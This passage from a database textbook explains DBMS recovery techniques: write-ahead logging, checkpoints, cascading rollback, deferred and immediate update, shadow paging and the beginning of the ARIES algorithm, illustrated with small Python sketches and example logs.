the database back to its BFIM). In an UNDO/REDO algorithm, both types of log
entries are combined. Additionally, when cascading rollback is possible, read_item
entries in the log are considered to be UNDO-type entries (see Section 1.5).

2In-place updating is used in most systems in practice.

As mentioned, the DBMS cache holds the cached database disk blocks in main
memory buffers, which include not only data blocks, but also index blocks and log
blocks from the disk. When a log record is written, it is stored in the current log
buffer in the DBMS cache. The log is simply a sequential (append-only) disk file,
and the DBMS cache may contain several log blocks in main memory buffers (typi-
cally, the last n log blocks of the log file). When an update to a data block—stored in
the DBMS cache—is made, an associated log record is written to the last log buffer
in the DBMS cache. With the write-ahead logging approach, the log buffers (blocks)
that contain the associated log records for a particular data block update must first
be written to disk before the data block itself can be written back to disk from its
main memory buffer.

Standard DBMS recovery terminology includes the terms steal/no-steal and
force/no-force, which specify the rules that govern when a page from the database
can be written to disk from the cache:

1. If a cache buffer page updated by a transaction cannot be written to disk
before the transaction commits, the recovery method is called a no-steal
approach. The pin-unpin bit will be used to indicate if a page cannot be
written back to disk. On the other hand, if the recovery protocol allows writ-
ing an updated buffer before the transaction commits, it is called steal. Steal
is used when the DBMS cache (buffer) manager needs a buffer frame for
another transaction and the buffer manager replaces an existing page that
had been updated but whose transaction has not committed. The no-steal
rule means that UNDO will never be needed during recovery, since a transaction
will not have written any of its updates to disk before it commits, so a failed
transaction has no changes on disk to undo.

2. If all pages updated by a transaction are immediately written to disk before
the transaction commits, it is called a force approach. Otherwise, it is called
no-force. The force rule means that REDO will never be needed during recov-
ery, since any committed transaction will have all its updates on disk before
it is committed.

The deferred update (NO-UNDO) recovery scheme discussed in Section 2 follows a
no-steal approach. However, typical database systems employ a steal/no-force strat-
egy. The advantage of steal is that it avoids the need for a very large buffer space to
store all updated pages in memory. The advantage of no-force is that an updated


page of a committed transaction may still be in the buffer when another transaction
needs to update it, thus eliminating the I/O cost to write that page multiple times to
disk, and possibly to have to read it again from disk. This may provide a substantial
saving in the number of disk I/O operations when a specific page is updated heavily
by multiple transactions.

To permit recovery when in-place updating is used, the appropriate entries required
for recovery must be permanently recorded in the log on disk before changes are
applied to the database. For example, consider the following write-ahead logging
(WAL) protocol for a recovery algorithm that requires both UNDO and REDO:

1. The before image of an item cannot be overwritten by its after image in the
database on disk until all UNDO-type log records for the updating transac-
tion—up to this point—have been force-written to disk.

2. The commit operation of a transaction cannot be completed until all the
REDO-type and UNDO-type log records for that transaction have been force-
written to disk.
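These two rules can be illustrated with the following toy log manager. It is a minimal sketch: the record formats, the use of list indexes as log sequence numbers, and the force placeholder are simplifying assumptions, not a real logging interface. Every update appends a log record first, a data page may be flushed only after the log has been forced up to that page's most recent record, and commit forces the remaining log records.

# Toy write-ahead logging (WAL) sketch: the log must reach disk before the
# corresponding data page does, and before commit completes.
class LogManager:
    def __init__(self):
        self.records = []        # the append-only log (in-memory buffer)
        self.flushed_upto = -1   # index of the last log record forced to disk

    def append(self, record):
        self.records.append(record)
        return len(self.records) - 1        # log sequence number (LSN)

    def force(self, upto_lsn):
        # Placeholder for writing log buffers up to upto_lsn to disk.
        self.flushed_upto = max(self.flushed_upto, upto_lsn)

log = LogManager()
page_lsn = {}                    # LSN of the latest log record for each page

def update(txn, page, old, new):
    lsn = log.append(('write_item', txn, page, old, new))   # UNDO + REDO info
    page_lsn[page] = lsn         # remember which log records cover this page

def flush_page(page):
    """WAL rule 1: force the log up to this page's last record before the
    before image on disk is overwritten by the after image."""
    log.force(page_lsn[page])
    print('page', page, 'written to disk')

def commit(txn):
    """WAL rule 2: force all of the transaction's log records before the
    commit is considered complete."""
    lsn = log.append(('commit', txn))
    log.force(lsn)

update('T1', 'P5', old=20, new=25)
flush_page('P5')                 # allowed only after the log is forced
commit('T1')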

To facilitate the recovery process, the DBMS recovery subsystem may need to main-
tain a number of lists related to the transactions being processed in the system.
These include a list for active transactions that have started but not committed as
yet, and it may also include lists of all committed and aborted transactions since
the last checkpoint (see the next section). Maintaining these lists makes the recovery
process more efficient.

1.4 Checkpoints in the System Log
and Fuzzy Checkpointing

Another type of entry in the log is called a checkpoint.3 A [checkpoint, list of active
transactions] record is written into the log periodically at that point when the system
writes out to the database on disk all DBMS buffers that have been modified. As a
consequence of this, all transactions that have their [commit, T ] entries in the log
before a [checkpoint] entry do not need to have their WRITE operations redone in case
of a system crash, since all their updates will be recorded in the database on disk
during checkpointing. As part of checkpointing, the list of transaction ids for active
transactions at the time of the checkpoint is included in the checkpoint record, so
that these transactions can be easily identified during recovery.

The recovery manager of a DBMS must decide at what intervals to take a check-
point. The interval may be measured in time—say, every m minutes—or in the
number t of committed transactions since the last checkpoint, where the values of m
or t are system parameters. Taking a checkpoint consists of the following actions:

1. Suspend execution of transactions temporarily.

2. Force-write all main memory buffers that have been modified to disk.

3. Write a [checkpoint] record to the log, and force-write the log to disk.

4. Resume executing transactions.

3The term checkpoint has been used to describe more restrictive situations in some systems, such as
DB2. It has also been used in the literature to describe entirely different concepts.

As a consequence of step 2, a checkpoint record in the log may also include addi-
tional information, such as a list of active transaction ids, and the locations
(addresses) of the first and most recent (last) records in the log for each active trans-
action. This can facilitate undoing transaction operations in the event that a trans-
action must be rolled back.

The time needed to force-write all modified memory buffers may delay transaction
processing because of step 1. To reduce this delay, it is common to use a technique
called fuzzy checkpointing. In this technique, the system can resume transaction
processing after a [begin_checkpoint] record is written to the log without having to
wait for step 2 to finish. When step 2 is completed, an [end_checkpoint, …] record is
written in the log with the relevant information collected during checkpointing.
However, until step 2 is completed, the previous checkpoint record should remain
valid. To accomplish this, the system maintains a file on disk that contains a pointer
to the valid checkpoint, which continues to point to the previous checkpoint record
in the log. Once step 2 is concluded, that pointer is changed to point to the new
checkpoint in the log.
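A minimal sketch of fuzzy checkpointing follows; simple lists stand in for the system log, the set of modified buffers, and the pointer file on disk, and the flushing loop is a placeholder for work that would proceed concurrently with normal transaction processing.

# Sketch of fuzzy checkpointing: transactions resume after begin_checkpoint,
# buffers are flushed in the background, and only when end_checkpoint is
# written does the on-disk pointer move to the new checkpoint record.
log = []                                  # append-only system log (simplified)
valid_checkpoint_pointer = None           # stands in for the pointer file on disk

def take_fuzzy_checkpoint(active_transactions, modified_buffers):
    global valid_checkpoint_pointer
    log.append(('begin_checkpoint', list(active_transactions)))
    begin_position = len(log) - 1
    # ... transaction processing resumes here; flushing happens concurrently ...
    for page in modified_buffers:         # step 2, done in the background
        print('flushing modified page', page)
    log.append(('end_checkpoint', list(active_transactions)))
    # Only now is the pointer switched; until this point the previous
    # checkpoint record remains the valid one for recovery.
    valid_checkpoint_pointer = begin_position

take_fuzzy_checkpoint(active_transactions=['T2', 'T3'],
                      modified_buffers=['P1', 'P7'])
print('valid checkpoint is log record', valid_checkpoint_pointer)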

1.5 Transaction Rollback and Cascading Rollback
If a transaction fails for whatever reason after updating the database, but before the
transaction commits, it may be necessary to roll back the transaction. If any data
item values have been changed by the transaction and written to the database, they
must be restored to their previous values (BFIMs). The undo-type log entries are
used to restore the old values of data items that must be rolled back.

If a transaction T is rolled back, any transaction S that has, in the interim, read the
value of some data item X written by T must also be rolled back. Similarly, once S is
rolled back, any transaction R that has read the value of some data item Y written by
S must also be rolled back; and so on. This phenomenon is called cascading roll-
back, and can occur when the recovery protocol ensures recoverable schedules but
does not ensure strict or cascadeless schedules. Understandably, cascading rollback
can be quite complex and time-consuming. That is why almost all recovery mecha-
nisms are designed so that cascading rollback is never required.

Figure 1 shows an example where cascading rollback is required. The read and write
operations of three individual transactions are shown in Figure 1(a). Figure 1(b)
shows the system log at the point of a system crash for a particular execution sched-
ule of these transactions. The values of data items A, B, C, and D, which are used by
the transactions, are shown to the right of the system log entries. We assume that the
original item values, shown in the first line, are A = 30, B = 15, C = 40, and D = 20. At
the point of system failure, transaction T3 has not reached its conclusion and must be
rolled back. The WRITE operations of T3, marked by a single * in Figure 1(b), are the
T3 operations that are undone during transaction rollback. Figure 1(c) graphically
shows the operations of the different transactions along the time axis.


Figure 1
Illustrating cascading rollback (a process that never occurs in strict or cascadeless
schedules). (a) The read and write operations of three transactions. (b) System log
at point of crash. (c) Operations before the crash (shown along a time axis in the
original figure).

(a) T1: read_item(A); read_item(D); write_item(D)
    T2: read_item(B); write_item(B); read_item(D); write_item(D)
    T3: read_item(C); write_item(B); read_item(A); write_item(A)

(b) Initial item values: A = 30, B = 15, C = 40, D = 20.

     [start_transaction, T3]
     [read_item, T3, C]
  *  [write_item, T3, B, 15, 12]          (B becomes 12)
     [start_transaction, T2]
     [read_item, T2, B]
  ** [write_item, T2, B, 12, 18]          (B becomes 18)
     [start_transaction, T1]
     [read_item, T1, A]
     [read_item, T1, D]
     [write_item, T1, D, 20, 25]          (D becomes 25)
     [read_item, T2, D]
  ** [write_item, T2, D, 25, 26]          (D becomes 26)
     [read_item, T3, A]
     (system crash)

  *  T3 is rolled back because it did not reach its commit point.
  ** T2 is rolled back because it reads the value of item B written by T3.


We must now check for cascading rollback. From Figure 1(c) we see that transaction
T2 reads the value of item B that was written by transaction T3; this can also be
determined by examining the log. Because T3 is rolled back, T2 must now be rolled
back, too. The WRITE operations of T2, marked by ** in the log, are the ones that are
undone. Note that only write_item operations need to be undone during transaction
rollback; read_item operations are recorded in the log only to determine whether
cascading rollback of additional transactions is necessary.
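The set of transactions that must be cascaded can in fact be computed from the log alone, which is exactly why read_item entries are recorded when cascading rollback is possible. The sketch below uses log entries abbreviated from Figure 1(b) (values omitted, since only the read-from relationships matter): it starts from the failed transaction and repeatedly adds any transaction that read an item whose most recent writer is already in the rollback set.

# Determine which transactions must be cascaded, given a (simplified) log.
log = [
    ('start', 'T3'), ('read', 'T3', 'C'), ('write', 'T3', 'B'),
    ('start', 'T2'), ('read', 'T2', 'B'), ('write', 'T2', 'B'),
    ('start', 'T1'), ('read', 'T1', 'A'), ('read', 'T1', 'D'),
    ('write', 'T1', 'D'), ('read', 'T2', 'D'), ('write', 'T2', 'D'),
    ('read', 'T3', 'A'),
]

def transactions_to_roll_back(log, failed):
    reads_from = []                   # (reader, writer) pairs derived from the log
    last_writer = {}                  # item -> transaction that last wrote it
    for entry in log:
        if entry[0] == 'write':
            _, txn, item = entry
            last_writer[item] = txn
        elif entry[0] == 'read':
            _, txn, item = entry
            if item in last_writer and last_writer[item] != txn:
                reads_from.append((txn, last_writer[item]))
    rollback = {failed}
    changed = True
    while changed:                    # fixed point: keep cascading
        changed = False
        for reader, writer in reads_from:
            if writer in rollback and reader not in rollback:
                rollback.add(reader)
                changed = True
    return rollback

print(transactions_to_roll_back(log, failed='T3'))   # {'T3', 'T2'}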

In practice, cascading rollback of transactions is never required because practical
recovery methods guarantee cascadeless or strict schedules. Hence, there is also no
need to record any read_item operations in the log because these are needed only for
determining cascading rollback.

1.6 Transaction Actions That Do Not Affect
the Database

In general, a transaction will have actions that do not affect the database, such as
generating and printing messages or reports from information retrieved from the
database. If a transaction fails before completion, we may not want the user to get
these reports, since the transaction has failed to complete. If such erroneous reports
are produced, part of the recovery process would have to inform the user that these
reports are wrong, since the user may take an action based on these reports that
affects the database. Hence, such reports should be generated only after the transac-
tion reaches its commit point. A common method of dealing with such actions is to
issue the commands that generate the reports but keep them as batch jobs, which
are executed only after the transaction reaches its commit point. If the transaction
fails, the batch jobs are canceled.

2 NO-UNDO/REDO Recovery Based
on Deferred Update

The idea behind deferred update is to defer or postpone any actual updates to the
database on disk until the transaction completes its execution successfully and
reaches its commit point.4

During transaction execution, the updates are recorded only in the log and in the
cache buffers. After the transaction reaches its commit point and the log is force-
written to disk, the updates are recorded in the database. If a transaction fails before
reaching its commit point, there is no need to undo any operations because the
transaction has not affected the database on disk in any way. Therefore, only REDO-
type log entries are needed in the log, which include the new value (AFIM) of the
item written by a write operation. The UNDO-type log entries are not needed since
no undoing of operations will be required during recovery. Although this may sim-
plify the recovery process, it cannot be used in practice unless transactions are short

and each transaction changes few items. For other types of transactions, there is the
potential for running out of buffer space because transaction changes must be held
in the cache buffers until the commit point.

4Hence deferred update can generally be characterized as a no-steal approach.

We can state a typical deferred update protocol as follows:

1. A transaction cannot change the database on disk until it reaches its commit
point.

2. A transaction does not reach its commit point until all its REDO-type log
entries are recorded in the log and the log buffer is force-written to disk.

Notice that step 2 of this protocol is a restatement of the write-ahead logging (WAL)
protocol. Because the database is never updated on disk until after the transaction
commits, there is never a need to UNDO any operations. REDO is needed in case the
system fails after a transaction commits but before all its changes are recorded in the
database on disk. In this case, the transaction operations are redone from the log
entries during recovery.

For multiuser systems with concurrency control, the concurrency control and
recovery processes are interrelated. Consider a system in which concurrency control
uses strict two-phase locking, so the locks on items remain in effect until the trans-
action reaches its commit point. After that, the locks can be released. This ensures
strict and serializable schedules. Assuming that [checkpoint] entries are included in
the log, a possible recovery algorithm for this case, which we call RDU_M (Recovery
using Deferred Update in a Multiuser environment), is given next.

Procedure RDU_M (NO-UNDO/REDO with checkpoints). Use two lists of
transactions maintained by the system: the committed transactions T since the
last checkpoint (commit list), and the active transactions T′ (active list).
REDO all the WRITE operations of the committed transactions from the log, in
the order in which they were written into the log. The transactions that are active
and did not commit are effectively canceled and must be resubmitted.

The REDO procedure is defined as follows:

Procedure REDO (WRITE_OP). Redoing a write_item operation WRITE_OP con-
sists of examining its log entry [write_item, T, X, new_value] and setting the value
of item X in the database to new_value, which is the after image (AFIM).

Figure 2 illustrates a timeline for a possible schedule of executing transactions.
When the checkpoint was taken at time t1, transaction T1 had committed, whereas
transactions T3 and T4 had not. Before the system crash at time t2, T3 and T2 were
committed but not T4 and T5. According to the RDU_M method, there is no need to
redo the write_item operations of transaction T1—or any transactions committed
before the last checkpoint time t1. The write_item operations of T2 and T3 must be
redone, however, because both transactions reached their commit points after the
last checkpoint. Recall that the log is force-written before committing a transaction.
Transactions T4 and T5 are ignored: They are effectively canceled or rolled back
because none of their write_item operations were recorded in the database on disk
under the deferred update protocol.


Figure 2
An example of a recovery timeline to illustrate the effect of checkpointing:
transactions T1 through T5 execute over time, with a checkpoint taken at time t1
and a system crash at time t2.

We can make the NO-UNDO/REDO recovery algorithm more efficient by noting that,
if a data item X has been updated—as indicated in the log entries—more than once
by committed transactions since the last checkpoint, it is only necessary to REDO
the last update of X from the log during recovery because the other updates would be
overwritten by this last REDO. In this case, we start from the end of the log; then,
whenever an item is redone, it is added to a list of redone items. Before REDO is
applied to an item, the list is checked; if the item appears on the list, it is not redone
again, since its last value has already been recovered.
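A sketch of this NO-UNDO/REDO redo pass follows, scanning the log backward from the end so that each item is redone only once with its final committed value. The list-based log, the tuple entry format, and the made-up on-disk values are simplifying assumptions; the log fragment is in the spirit of Figure 3(b) after the last checkpoint.

# Sketch of the RDU_M idea: redo only the last committed write of each item,
# by scanning the (simplified) log backward from its end.
def redo_pass(log, committed_since_checkpoint, database):
    redone = set()
    for entry in reversed(log):
        if entry[0] != 'write_item':
            continue
        _, txn, item, new_value = entry
        if txn in committed_since_checkpoint and item not in redone:
            database[item] = new_value      # REDO: install the after image
            redone.add(item)
    return database

# Log entries recorded after the last checkpoint:
log = [
    ('start_transaction', 'T4'), ('write_item', 'T4', 'B', 15),
    ('write_item', 'T2', 'B', 12), ('write_item', 'T4', 'A', 20),
    ('commit', 'T4'),
    ('start_transaction', 'T3'), ('write_item', 'T3', 'A', 30),
    ('write_item', 'T2', 'D', 25),          # system crash after this entry
]
db = {'A': 10, 'B': 5, 'D': 20}             # on-disk values (illustrative)
print(redo_pass(log, committed_since_checkpoint={'T4'}, database=db))
# {'A': 20, 'B': 15, 'D': 20}: only T4's writes are redone, one value per item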

If a transaction is aborted for any reason (say, by the deadlock detection method), it
is simply resubmitted, since it has not changed the database on disk. A drawback of
the method described here is that it limits the concurrent execution of transactions
because all write-locked items remain locked until the transaction reaches its commit
point. Additionally, it may require excessive buffer space to hold all updated items
until the transactions commit. The method’s main benefit is that transaction oper-
ations never need to be undone, for two reasons:

1. A transaction does not record any changes in the database on disk until after
it reaches its commit point—that is, until it completes its execution success-
fully. Hence, a transaction is never rolled back because of failure during
transaction execution.

2. A transaction will never read the value of an item that is written by an
uncommitted transaction, because items remain locked until a transaction
reaches its commit point. Hence, no cascading rollback will occur.

Figure 3 shows an example of recovery for a multiuser system that utilizes the recov-
ery and concurrency control method just described.

3 Recovery Techniques Based
on Immediate Update

In these techniques, when a transaction issues an update command, the database on
disk can be updated immediately, without any need to wait for the transaction to
reach its commit point. Notice that it is not a requirement that every update be


Figure 3
An example of recovery using deferred update with concurrent transactions.
(a) The READ and WRITE operations of four transactions. (b) System log at the
point of crash.

(a) T1: read_item(A); read_item(D); write_item(D)
    T2: read_item(B); write_item(B); read_item(D); write_item(D)
    T3: read_item(A); write_item(A); read_item(C); write_item(C)
    T4: read_item(B); write_item(B); read_item(A); write_item(A)

(b) [start_transaction, T1]
    [start_transaction, T2]
    [write_item, T1, D, 20]
    [commit, T1]
    [checkpoint]
    [start_transaction, T4]
    [write_item, T4, B, 15]
    [write_item, T2, B, 12]
    [write_item, T4, A, 20]
    [commit, T4]
    [start_transaction, T3]
    [write_item, T3, A, 30]
    [write_item, T2, D, 25]
    (system crash)

T2 and T3 are ignored because they did not reach their commit points.
T4 is redone because its commit point is after the last system checkpoint.

applied immediately to disk; it is just possible that some updates are applied to disk
before the transaction commits.

Provisions must be made for undoing the effect of update operations that have been
applied to the database by a failed transaction. This is accomplished by rolling back
the transaction and undoing the effect of the transaction’s write_item operations.
Therefore, the UNDO-type log entries, which include the old value (BFIM) of the
item, must be stored in the log. Because UNDO can be needed during recovery,
these methods follow a steal strategy for deciding when updated main memory
buffers can be written back to disk (see Section 1.3). Theoretically, we can distin-
guish two main categories of immediate update algorithms. If the recovery tech-
nique ensures that all updates of a transaction are recorded in the database on disk
before the transaction commits, there is never a need to REDO any operations of
committed transactions. This is called the UNDO/NO-REDO recovery algorithm.
In this method, all updates by a transaction must be recorded on disk before the
transaction commits, so that REDO is never needed. Hence, this method must utilize


the force strategy for deciding when updated main memory buffers are written
back to disk (see Section 1.3).

If the transaction is allowed to commit before all its changes are written to the data-
base, we have the most general case, known as the UNDO/REDO recovery algo-
rithm. In this case, the steal/no-force strategy is applied (see Section 1.3). This is
also the most complex technique. We will outline an UNDO/REDO recovery algo-
rithm and leave it as an exercise for the reader to develop the UNDO/NO-REDO vari-
ation. In Section 5, we describe a more practical approach known as the ARIES
recovery technique.

When concurrent execution is permitted, the recovery process again depends on the
protocols used for concurrency control. The procedure RIU_M (Recovery using
Immediate Updates for a Multiuser environment) outlines a recovery algorithm for
concurrent transactions with immediate update (UNDO/REDO recovery). Assume
that the log includes checkpoints and that the concurrency control protocol pro-
duces strict schedules—as, for example, the strict two-phase locking protocol does.
Recall that a strict schedule does not allow a transaction to read or write an item
unless the transaction that last wrote the item has committed (or aborted and rolled
back). However, deadlocks can occur in strict two-phase locking, thus requiring
abort and UNDO of transactions. For a strict schedule, UNDO of an operation
requires changing the item back to its old value (BFIM).

Procedure RIU_M (UNDO/REDO with checkpoints).

1. Use two lists of transactions maintained by the system: the committed trans-
actions since the last checkpoint and the active transactions.

2. Undo all the write_item operations of the active (uncommitted) transactions,
using the UNDO procedure. The operations should be undone in the reverse
of the order in which they were written into the log.

3. Redo all the write_item operations of the committed transactions from the log,
in the order in which they were written into the log, using the REDO proce-
dure defined earlier.

The UNDO procedure is defined as follows:

Procedure UNDO (WRITE_OP). Undoing a write_item operation write_op con-
sists of examining its log entry [write_item, T, X, old_value, new_value] and setting
the value of item X in the database to old_value, which is the before image
(BFIM). Undoing a number of write_item operations from one or more trans-
actions from the log must proceed in the reverse order from the order in which
the operations were written in the log.
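A compact sketch of procedure RIU_M follows, assuming log entries shaped like those in the UNDO and REDO procedures (tuples rather than real log records, and an in-memory dictionary standing in for the database on disk): the writes of active transactions are undone in reverse log order, then the writes of committed transactions are redone in forward log order.

# Sketch of RIU_M: undo the writes of active transactions in reverse log order,
# then redo the writes of committed transactions in forward log order.
def riu_m(log, committed, active, database):
    # Step 2: UNDO the write_item operations of active (uncommitted)
    # transactions, in the reverse of the order they appear in the log.
    for entry in reversed(log):
        if entry[0] == 'write_item' and entry[1] in active:
            _, txn, item, old_value, new_value = entry
            database[item] = old_value          # restore the before image (BFIM)
    # Step 3: REDO the write_item operations of committed transactions, in the
    # order they were written into the log.
    for entry in log:
        if entry[0] == 'write_item' and entry[1] in committed:
            _, txn, item, old_value, new_value = entry
            database[item] = new_value          # install the after image (AFIM)
    return database

log = [
    ('write_item', 'T1', 'D', 20, 25), ('commit', 'T1'),
    ('write_item', 'T2', 'B', 15, 12),
    ('write_item', 'T2', 'B', 12, 18),          # T2 is still active at the crash
]
db = {'B': 18, 'D': 20}     # T2's writes reached disk (steal); T1's did not
print(riu_m(log, committed={'T1'}, active={'T2'}, database=db))
# {'B': 15, 'D': 25}: T2 rolled back to B's original value, T1's write redone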

As we discussed for the NO-UNDO/REDO procedure, step 3 is more efficiently done
by starting from the end of the log and redoing only the last update of each item X.
Whenever an item is redone, it is added to a list of redone items and is not redone
again. A similar procedure can be devised to improve the efficiency of step 2 so that
an item can be undone at most once during recovery. In this case, the earliest
UNDO is applied first by scanning the log in the forward direction (starting from the
beginning of the log). Whenever an item is undone, it is added to a list of undone
items and is not undone again.

Figure 4
An example of shadow paging: after updating pages 2 and 5, the current directory
points to the new copies of those pages on disk, while the shadow directory (not
updated) continues to point to the old copies; the unchanged pages are shared by
both directories.

4 Shadow Paging
This recovery scheme does not require the use of a log in a single-user environment.
In a multiuser environment, a log may be needed for the concurrency control
method. Shadow paging considers the database to be made up of a number of fixed-
size disk pages (or disk blocks)—say, n—for recovery purposes. A directory with n
entries5 is constructed, where the ith entry points to the ith database page on disk.
The directory is kept in main memory if it is not too large, and all references—reads
or writes—to database pages on disk go through it. When a transaction begins exe-
cuting, the current directory—whose entries point to the most recent or current
database pages on disk—is copied into a shadow directory. The shadow directory is
then saved on disk while the current directory is used by the transaction.

During transaction execution, the shadow directory is never modified. When a
write_item operation is performed, a new copy of the modified database page is cre-
ated, but the old copy of that page is not overwritten. Instead, the new page is writ-
ten elsewhere—on some previously unused disk block. The current directory entry
is modified to point to the new disk block, whereas the shadow directory is not
modified and continues to point to the old unmodified disk block. Figure 4 illus-
trates the concepts of shadow and current directories. For pages updated by the
transaction, two versions are kept. The old version is referenced by the shadow
directory and the new version by the current directory.
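
A compact sketch of this bookkeeping is given below, assuming a hypothetical representation in which the disk is a dictionary from block numbers to page contents and each directory is a Python list; the class and method names are illustrative only, not part of the technique's definition.

    class ShadowPagedDB:
        def __init__(self, disk, current_dir):
            self.disk = disk                      # block number -> page contents
            self.current_dir = list(current_dir)  # ith entry -> block holding page i
            self.shadow_dir = None
            self.next_free = max(disk) + 1        # naive allocator for unused blocks

        def begin_transaction(self):
            # Copy the current directory into the shadow directory and keep it fixed.
            self.shadow_dir = list(self.current_dir)

        def write_page(self, i, new_contents):
            # Never overwrite the old copy: write the new version to a previously
            # unused block and repoint only the current directory entry.
            new_block = self.next_free
            self.next_free += 1
            self.disk[new_block] = new_contents
            self.current_dir[i] = new_block

        def commit(self):
            # Discard the shadow directory; the old page versions it referenced
            # can now be released to the free list.
            self.shadow_dir = None

        def recover_from_failure(self):
            # NO-UNDO/NO-REDO: reinstate the shadow directory, discarding the
            # modified pages created by the failed transaction.
            self.current_dir = list(self.shadow_dir)

Because the shadow directory on disk is never touched during the transaction, recovery amounts to re-reading it; no log records are consulted.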

5The directory is similar to the page table maintained by the operating system for each process.


To recover from a failure during transaction execution, it is sufficient to free the
modified database pages and to discard the current directory. The state of the data-
base before transaction execution is available through the shadow directory, and
that state is recovered by reinstating the shadow directory. The database thus is
returned to its state prior to the transaction that was executing when the crash
occurred, and any modified pages are discarded. Committing a transaction corre-
sponds to discarding the previous shadow directory. Since recovery involves neither
undoing nor redoing data items, this technique can be categorized as a NO-
UNDO/NO-REDO technique for recovery.

In a multiuser environment with concurrent transactions, logs and checkpoints must
be incorporated into the shadow paging technique. One disadvantage of shadow
paging is that the updated database pages change location on disk. This makes it dif-
ficult to keep related database pages close together on disk without complex storage
management strategies. Furthermore, if the directory is large, the overhead of writ-
ing shadow directories to disk as transactions commit is significant. A further com-
plication is how to handle garbage collection when a transaction commits. The old
pages referenced by the shadow directory that have been updated must be released
and added to a list of free pages for future use. These pages are no longer needed after
the transaction commits. Another issue is that the operation to migrate between cur-
rent and shadow directories must be implemented as an atomic operation.

5 The ARIES Recovery Algorithm
We now describe the ARIES algorithm as an example of a recovery algorithm used
in database systems. It is used in many of IBM's relational database products.
ARIES uses a steal/no-force approach for writing, and it is based on three concepts:
write-ahead logging, repeating history during redo, and logging changes during
undo. We discussed write-ahead logging in Section 1.3. The second concept,
repeating history, means that ARIES will retrace all actions of the database system
prior to the crash to reconstruct the database state when the crash occurred.
Transactions that were uncommitted at the time of the crash (active transactions)
are undone. The third concept, logging during undo, will prevent ARIES from
repeating the completed undo operations if a failure occurs during recovery, which
causes a restart of the recovery process.

The ARIES recovery procedure consists of three main steps: analysis, REDO, and
UNDO. The analysis step identifies the dirty (updated) pages in the buffer6 and the
set of transactions active at the time of the crash. The appropriate point in the log
where the REDO operation should start is also determined. The REDO phase actu-
ally reapplies updates from the log to the database. Generally, the REDO operation is
applied only to committed transactions. However, this is not the case in ARIES.
Certain information in the ARIES log will provide the start point for REDO, from

6The actual buffers may be lost during a crash, since they are in main memory. Additional tables stored in
the log during checkpointing (Dirty Page Table, Transaction Table) allow ARIES to identify this informa-
tion (as discussed later in this section).


which REDO operations are applied until the end of the log is reached. Additionally,
information stored by ARIES and in the data pages will allow ARIES to determine
whether the operation to be redone has actually been applied to the database and
therefore does not need to be reapplied. Thus, only the necessary REDO operations
are applied during recovery. Finally, during the UNDO phase, the log is scanned
backward and the operations of transactions that were active at the time of the crash
are undone in reverse order. The information needed for ARIES to accomplish its
recovery procedure includes the log, the Transaction Table, and the Dirty Page
Table. Additionally, checkpointing is used. These tables are maintained by the trans-
action manager and written to the log during checkpointing.

In ARIES, every log record has an associated log sequence number (LSN) that is
monotonically increasing and indicates the address of the log record on disk. Each
LSN corresponds to a specific change (action) of some transaction. Also, each data
page will store the LSN of the latest log record corresponding to a change for that page.
A log record is written for any of the following actions: updating a page (write),
committing a transaction (commit), aborting a transaction (abort), undoing an
update (undo), and ending a transaction (end). The need for including the first
three actions in the log has been discussed, but the last two need some explanation.
When an update is undone, a compensation log record is written in the log. When a
transaction ends, whether by committing or aborting, an end log record is written.

Common fields in all log records include the previous LSN for that transaction, the
transaction ID, and the type of log record. The previous LSN is important because it
links the log records (in reverse order) for each transaction. For an update (write)
action, additional fields in the log record include the page ID for the page that con-
tains the item, the length of the updated item, its offset from the beginning of the
page, the before image of the item, and its after image.
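
As an illustration, an update log record carrying these fields could be modeled as follows; the Python field names are assumptions chosen to mirror the description above, not identifiers defined by ARIES.

    from dataclasses import dataclass
    from typing import Optional

    @dataclass
    class LogRecord:
        lsn: int                          # monotonically increasing log sequence number
        prev_lsn: Optional[int]           # previous LSN of the same transaction
        tran_id: str
        rec_type: str                     # 'update', 'commit', 'abort', 'undo' (CLR), or 'end'
        page_id: Optional[str] = None     # the remaining fields are used for updates only
        offset: Optional[int] = None
        length: Optional[int] = None
        before_image: Optional[bytes] = None
        after_image: Optional[bytes] = None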

Besides the log, two tables are needed for efficient recovery: the Transaction Table
and the Dirty Page Table, which are maintained by the transaction manager. When
a crash occurs, these tables are rebuilt in the analysis phase of recovery. The
Transaction Table contains an entry for each active transaction, with information
such as the transaction ID, transaction status, and the LSN of the most recent log
record for the transaction. The Dirty Page Table contains an entry for each dirty
page in the buffer, which includes the page ID and the LSN corresponding to the
earliest update to that page.
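
Continuing the same illustrative style, the two tables can be held as plain dictionaries; the sample values below loosely mirror the checkpoint-time tables of Figure 5(b) and are included only as an example.

    # Transaction Table: transaction id -> (status, LSN of its most recent log record)
    transaction_table = {
        'T1': ('commit', 3),
        'T2': ('in progress', 2),
    }

    # Dirty Page Table: page id -> recLSN, the LSN of the earliest update to that page
    dirty_page_table = {
        'C': 1,
        'B': 2,
    }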

Checkpointing in ARIES consists of the following: writing a begin_checkpoint record
to the log, writing an end_checkpoint record to the log, and writing the LSN of the
begin_checkpoint record to a special file. This special file is accessed during recovery
to locate the last checkpoint information. With the end_checkpoint record, the con-
tents of both the Transaction Table and Dirty Page Table are appended to the end of
the log. To reduce the cost, fuzzy checkpointing is used so that the DBMS can con-
tinue to execute transactions during checkpointing (see Section 1.4). Additionally,
the contents of the DBMS cache do not have to be flushed to disk during check-
point, since the Transaction Table and Dirty Page Table—which are appended to the
log on disk—contain the information needed for recovery. Note that if a crash occurs during checkpointing, the special file will refer to the previous checkpoint,
which is used for recovery.
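
Under the same illustrative assumptions (the log as a Python list whose indexes serve as LSNs), fuzzy checkpointing reduces to a couple of log appends plus one small file write; the helper names below are invented for this sketch.

    def append_to_log(log, record):
        log.append(record)
        return len(log) - 1                      # the index doubles as the LSN

    def fuzzy_checkpoint(log, transaction_table, dirty_page_table, master_path):
        # Transactions keep executing and the cache is not flushed; the two
        # tables appended to the log carry what recovery will need.
        begin_lsn = append_to_log(log, ('begin_checkpoint',))
        append_to_log(log, ('end_checkpoint',
                            dict(transaction_table),    # snapshot of the Transaction Table
                            dict(dirty_page_table)))    # snapshot of the Dirty Page Table
        # Record where the last complete checkpoint begins; recovery reads this
        # special file first. If a crash strikes before this write, the file still
        # points at the previous checkpoint, which is then used instead.
        with open(master_path, 'w') as f:
            f.write(str(begin_lsn))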

After a crash, the ARIES recovery manager takes over. Information from the last
checkpoint is first accessed through the special file. The analysis phase starts at the
begin_checkpoint record and proceeds to the end of the log. When the end_checkpoint
record is encountered, the Transaction Table and Dirty Page Table are accessed
(recall that these tables were written in the log during checkpointing). During
analysis, the log records being analyzed may cause modifications to these two tables.
For instance, if an end log record is encountered for a transaction T in the
